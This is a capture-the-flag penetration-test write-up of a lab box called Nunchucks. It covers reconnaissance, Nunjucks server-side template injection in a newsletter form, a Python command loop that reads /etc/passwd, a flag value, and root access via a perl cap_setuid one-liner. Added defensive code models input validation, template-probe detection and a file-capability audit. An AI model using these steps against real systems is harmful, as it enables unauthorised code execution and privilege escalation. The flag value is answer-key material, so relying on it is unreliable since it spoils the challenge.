Nunchucks
Introduction
IP: 54.208.212.226
Objective
The objective of this assessment is to perform a penetration test against the server. The pentester is tasked with following a methodical approach to reach the objective goals. This test should simulate an actual penetration test from beginning to end, including the overall report.
Recommendations
I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and, once patched, should remain on a regular patch program to protect against additional vulnerabilities that are discovered at a later date.
Pentesting
Nmap
| Server IP Address | Ports Open |
|---|---|
| 54.208.212.226 | TCP: 22, 80, 443 |
Nmap Scan Results:
```
# Nmap 7.91 scan initiated Sat Oct 9 07:11:11 2021 as: nmap -Pn -sCV -p22,80,443 -oN nmap/Basic_54.208.212.226.nmap 54.208.212.226
Nmap scan report for nunchucks.uhc (54.208.212.226)
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6c:14:6d:bb:74:59:c3:78:2e:48:f5:11:d8:5b:47:21 (RSA)
| 256 a2:f4:2c:42:74:65:a3:7c:26:dd:49:72:23:82:72:71 (ECDSA)
|_ 256 e1:8d:44:e7:21:6d:7c:13:2f:ea:3b:83:58:aa:02:b3 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://nunchucks.uhc/
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Nunchucks - Landing Page
| ssl-cert: Subject: commonName=nunchucks.htb/organizationName=Nunchucks-Certificates/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:localhost, DNS:nunchucks.htb
| Not valid before: 2021-08-30T15:42:24
|_Not valid after: 2031-08-28T15:42:24
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
From the nmap scan, port 80 redirects to https://nunchucks.uhc. Let's add that to our hosts file.
```
cat /etc/hosts
54.208.212.226 nunchucks.uhc
```
Port 80, Port 443
Port 80 is redirected to 443.
Scrolling through the page, we found a signup link.
When I tried to register, the server gave a response saying **registrations are closed.**
Subdomain Enumeration
```
kali@kali:$ ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -u https://nunchucks.uhc -H "Host: FUZZ.nunchucks.uhc" -fs 30589

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : https://nunchucks.uhc
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.nunchucks.uhc
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 30589
________________________________________________

store [Status: 200, Size: 30589, Words: 12757, Lines: 547]
```
We have a new subdomain: store.nunchucks.uhc. Add it to the hosts file as well.
```
cat /etc/hosts
54.208.212.226 nunchucks.uhc nunchucks.htb store.nunchucks.uhc
```
FLAG - 1
When I tried to subscribe to the newsletter, I got the same email that I entered back in the response.
SSTI
Let's intercept the request in Burp and play with the input.
I tried to inject some template code `````` and it was successfully executed and returned the value 49, which confirms SSTI.
Reference: http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine
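Defensive counterpart to the finding above, added here as an example and not code from the original post or from the Nunchucks application: a model of a hardened `/api/submit` handler that allow-lists the address and never hands user input to the template engine as template source, plus a detector for template delimiters in submitted bodies. The function names, the response wording and the sample bodies are constructed for this example.

```python
import json
import re

# Accepted address shape for the newsletter field (a constructed allow-list for this example):
# local@domain.tld, no whitespace, none of the characters Nunjucks uses as delimiters.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$")

# Delimiters of Nunjucks/Jinja-style engines: expressions, tags and comments.
TEMPLATE_DELIMS = ("{{", "}}", "{%", "%}", "{#", "#}")


def looks_like_template_probe(value: str) -> bool:
    """True when the value carries template syntax, e.g. an arithmetic probe such as {{7*7}}."""
    return any(d in value for d in TEMPLATE_DELIMS)


def validate_email(value) -> tuple:
    """Allow-list check: accept a plain address, otherwise return (False, reason)."""
    if not isinstance(value, str) or len(value) > 254:
        return False, "not a string or too long"
    if looks_like_template_probe(value):
        return False, "template syntax in address"
    if not EMAIL_RE.match(value):
        return False, "not a valid address shape"
    return True, "ok"


def handle_submit(body: str) -> dict:
    """Model of a hardened /api/submit: validate, then echo the address as data only.
    The vulnerable pattern is concatenating the address into the template source and rendering
    that string; the fix is a fixed template that receives the address purely as a context value
    (in Nunjucks: render the static template with {"email": email}). Response text is constructed."""
    try:
        email = json.loads(body).get("email", "")
    except (json.JSONDecodeError, AttributeError):
        return {"status": 400, "error": "malformed JSON"}
    ok, reason = validate_email(email)
    if not ok:
        return {"status": 400, "error": reason}
    return {"status": 200, "response": "You will receive updates at " + email + "."}


def flag_probes(request_bodies: list) -> list:
    """Detection side: return the request bodies that contain template delimiters."""
    return [b for b in request_bodies if looks_like_template_probe(b)]


if __name__ == "__main__":
    # Constructed sample bodies modelled on the page's POST /api/submit request.
    samples = ['{"email":"tinyb0y@pm.me"}', '{"email":"{{7*7}}@pm.me"}', '{"email":"{# x #}a@b.io"}']
    for s in samples:
        print(s, "->", handle_submit(s))
    print("flagged:", flag_probes(samples))
```

Rejecting at the edge is a backstop; the actual fix is in the Node handler, which must render a fixed template and pass the address as a context variable instead of building the template string from the request.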
Injecting Payload
We have RCE on the server. The response was not easy to read and I was too lazy to go through it, so I made a simple Python script which does the work and gives us the feel of a shell.
```python
import json
import warnings

import requests

# Silence the self-signed-certificate warning that verify=False triggers on every request.
warnings.filterwarnings("ignore", message="Unverified HTTPS request")

"""
Captured request being replayed (copied from Burp):

POST /api/submit HTTP/1.1
Host: store.nunchucks.uhc
Cookie: _csrf=xvbnCwBpmQYXDUQDfVN7qOgT
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://store.nunchucks.uhc/
Content-Type: application/json
Origin: https://store.nunchucks.uhc
Content-Length: 154
Te: trailers
Connection: close
{"email":"tinyb0y@pm.me,"
}
"""

URL = "https://store.nunchucks.uhc/api/submit"

while True:
    COMMAND = input(">>")
    # The email field carries the injected template expression that runs COMMAND on the server.
    # That expression was not preserved on this page, so only the address prefix is shown here.
    data = {"email": "tinyb0y@pm.me,"}
    r = requests.post(URL, json=data, verify=False)
    json_data = json.loads(r.text)
    # The server echoes the address followed by the command output; keep only the output part.
    # The replace() is a no-op as printed; presumably it unescaped a quote entity lost in extraction.
    output = json_data["response"].split(".com,")[1].strip().replace("'", "'")
    for line in output.splitlines():
        print(line)
```
```
>>cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
david:x:1000:1000:david:/home/david:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
rtkit:x:113:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
geoclue:x:115:120::/var/lib/geoclue:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:117:123:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
saned:x:118:124::/var/lib/saned:/usr/sbin/nologin
colord:x:119:125:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
pulse:x:120:126:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
mysql:x:121:128:MySQL Server,,,:/nonexistent:/bin/false
```
We are running as the user david.
FLAG - 2
```
>>cat /home/david/user.txt
UHC{s5st1-@ll-day}
```
Adding our SSH key to the server.
Logging in as david.
Priv Esc
Uploaded linpeas.sh and found that perl is set with the capability cap_setuid.
```
/usr/bin/perl5.30.0 -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
```
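Added example, not from the original post or from linpeas: a Python audit that parses `getcap -r` output and flags dangerous file capabilities, singling out interpreters such as the perl binary above, since cap_setuid on an interpreter is equivalent to root for anyone who can execute it. The two getcap line formats, the capability list and the sample output are assumptions noted in the comments.

```python
import re
import shutil
import subprocess

# Capabilities that change identity or bypass DAC; on an interpreter any of these
# hands full root to whoever can run the binary (constructed list for this audit).
DANGEROUS_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
                  "cap_sys_admin", "cap_sys_ptrace", "cap_chown", "cap_fowner"}
INTERPRETER_RE = re.compile(r"/(perl|python|ruby|node|php|lua|tclsh)[0-9.]*$")

# getcap prints "/path = cap_a,cap_b+ep" (older libcap) or "/path cap_a,cap_b=ep"
# (newer libcap); both forms are accepted here.
LINE_RE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>[a-z_,]+)[=+]\w+$")

# Constructed sample of getcap -r output, including the perl finding from the box.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl5.30.0 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
"""

def parse_getcap(output: str) -> dict:
    """Map each path in getcap output to the set of capability names it carries."""
    result = {}
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            result[m.group("path")] = set(m.group("caps").split(","))
    return result

def risky_files(caps: dict) -> list:
    """(path, dangerous caps present, is_interpreter) for every file carrying a dangerous cap."""
    findings = []
    for path, names in sorted(caps.items()):
        bad = names & DANGEROUS_CAPS
        if bad:
            findings.append((path, bad, bool(INTERPRETER_RE.search(path))))
    return findings

def audit_host() -> list:
    """Same check against the live host; needs libcap's getcap on PATH."""
    if shutil.which("getcap") is None:
        raise RuntimeError("getcap not installed")
    out = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout
    return risky_files(parse_getcap(out))

if __name__ == "__main__":
    for path, bad, interp in risky_files(parse_getcap(SAMPLE_GETCAP)):
        print(f"{path}: {','.join(sorted(bad))}{'  <-- interpreter, equivalent to root' if interp else ''}")
```

Remediation for the finding is to strip the capability (`setcap -r /usr/bin/perl5.30.0`) and to re-run the audit after patch cycles, since package upgrades can reinstate file capabilities.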